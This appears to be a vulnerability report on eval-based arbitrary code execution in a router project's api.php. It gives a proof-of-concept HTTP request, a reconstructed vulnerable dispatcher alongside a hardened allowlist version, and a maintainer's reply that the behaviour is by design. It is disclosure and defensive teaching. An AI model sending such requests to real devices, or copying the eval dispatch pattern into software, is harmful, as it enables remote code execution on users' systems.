In api.php the eval function is used, and several other parameters are controllable, leading to arbitrary code execution.

```php
$c = new $o();
$o = _GET("class",'unknow');
$f = _GET('function','unknow');
$agrs = implode(',',$_POST);
```

As can be seen, $o is an object, $c is the instantiation of the $o object, $f is a member method of the object, and $agrs is the parameter passed in via POST, that is, the argument to the member method.

poc:

```http
POST /6/api.php?function=command&class=remote HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

cc='ls'
```

Tracing the execution flow, what is actually executed is the following code, which leads to an arbitrary code execution vulnerability.

```php
$c = new remote;
$j = $c->command('ls');
```
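The dispatch pattern the report describes, placed beside a hardened replacement, as an added example that is not code from the project in the issue. The report says api.php uses eval() but does not show that line; the reconstruction below assumes the method call is assembled as a string and passed to eval(), which is consistent with the PoC needing literal quotes around ls. The classes `remote` and `internalAdmin`, the constant `API_ALLOWLIST` and the functions `vulnerableDispatch` and `safeDispatch` are hypothetical stand-ins.

```php
<?php
// Added example, not code from the project in the issue. Reconstructs the
// request-driven dispatch the report describes and pairs it with a hardened form.
declare(strict_types=1);

// Hypothetical handler classes standing in for the project's own.
// remote::command stands in for the method the PoC reaches; here it only echoes.
final class remote
{
    public function command(string $cmd): string
    {
        return 'would run: ' . $cmd;
    }

    public function status(): string
    {
        return 'ok';
    }
}

// A class the API was never meant to expose; reachable only through the vulnerable form.
final class internalAdmin
{
    public function wipe(): string
    {
        return 'wiped';
    }
}

/**
 * Vulnerable dispatcher, reconstructed from the issue. The report says api.php
 * uses eval(); the exact line is not shown, so the string building here is an
 * assumption. Class name, method name and argument text all come from the request.
 */
function vulnerableDispatch(array $get, array $post): string
{
    $o    = $get['class'] ?? 'unknow';
    $f    = $get['function'] ?? 'unknow';
    $agrs = implode(',', $post);   // POST cc='ls' becomes the text 'ls', quotes included
    $c    = new $o();
    $code = '$j = $c->' . $f . '(' . $agrs . '); return $j;';
    return (string) eval($code);
}

// Hardened form (added here, not the project's fix): a static allowlist of
// class => exported methods, arguments passed as values, and no eval().
const API_ALLOWLIST = [
    'remote' => ['status'],   // command is deliberately not exported
];

function safeDispatch(array $get, array $post): string
{
    $class  = (string) ($get['class'] ?? '');
    $method = (string) ($get['function'] ?? '');

    if (!array_key_exists($class, API_ALLOWLIST)
        || !in_array($method, API_ALLOWLIST[$class], true)) {
        throw new InvalidArgumentException("not an exported API: $class::$method");
    }

    $ref = new ReflectionMethod($class, $method);
    if (!$ref->isPublic() || $ref->isStatic()) {
        throw new InvalidArgumentException("method not callable through the API");
    }

    // Positional values only: array_values() drops request-chosen keys, which
    // PHP 8 would otherwise treat as named arguments.
    $args = array_values($post);
    $n = count($args);
    if ($n < $ref->getNumberOfRequiredParameters() || $n > $ref->getNumberOfParameters()) {
        throw new InvalidArgumentException("wrong number of arguments for $class::$method");
    }

    return (string) $ref->invokeArgs(new $class(), $args);
}

// Constructed requests. The first matches the PoC in the report:
//   GET /6/api.php?function=command&class=remote   POST cc='ls'
$pocGet  = ['function' => 'command', 'class' => 'remote'];
$pocPost = ['cc' => "'ls'"];

echo vulnerableDispatch($pocGet, $pocPost), PHP_EOL;   // remote::command is reached with 'ls'
echo vulnerableDispatch(['class' => 'internalAdmin', 'function' => 'wipe'], []), PHP_EOL; // any loaded class is reachable

$requests = [
    [$pocGet, $pocPost],                                         // command is not exported
    [['class' => 'internalAdmin', 'function' => 'wipe'], []],    // class is not exported
    [['class' => 'remote', 'function' => 'status'], $pocPost],   // status takes no arguments
    [['class' => 'remote', 'function' => 'status'], []],         // the only exported call
];
foreach ($requests as [$get, $post]) {
    try {
        echo 'safe: ', safeDispatch($get, $post), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Run it with `php example.php`. The hardened form removes all three attacker-controlled dimensions of the original: the class and method must appear in a map the code owns, the arguments reach the method as values rather than as source text, and the reflection check keeps a future non-public or static method from becoming callable by accident. Validating each argument's type and content inside the exported methods is still the handler's job.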
This project is designed to run only on a router, protected by the local network. So allowing arbitrary code execution here is by design.
Unless the kids in your house maliciously attack you over your home Wi-Fi. Of course, attacks resulting from a leaked Wi-Fi password are outside the design scope.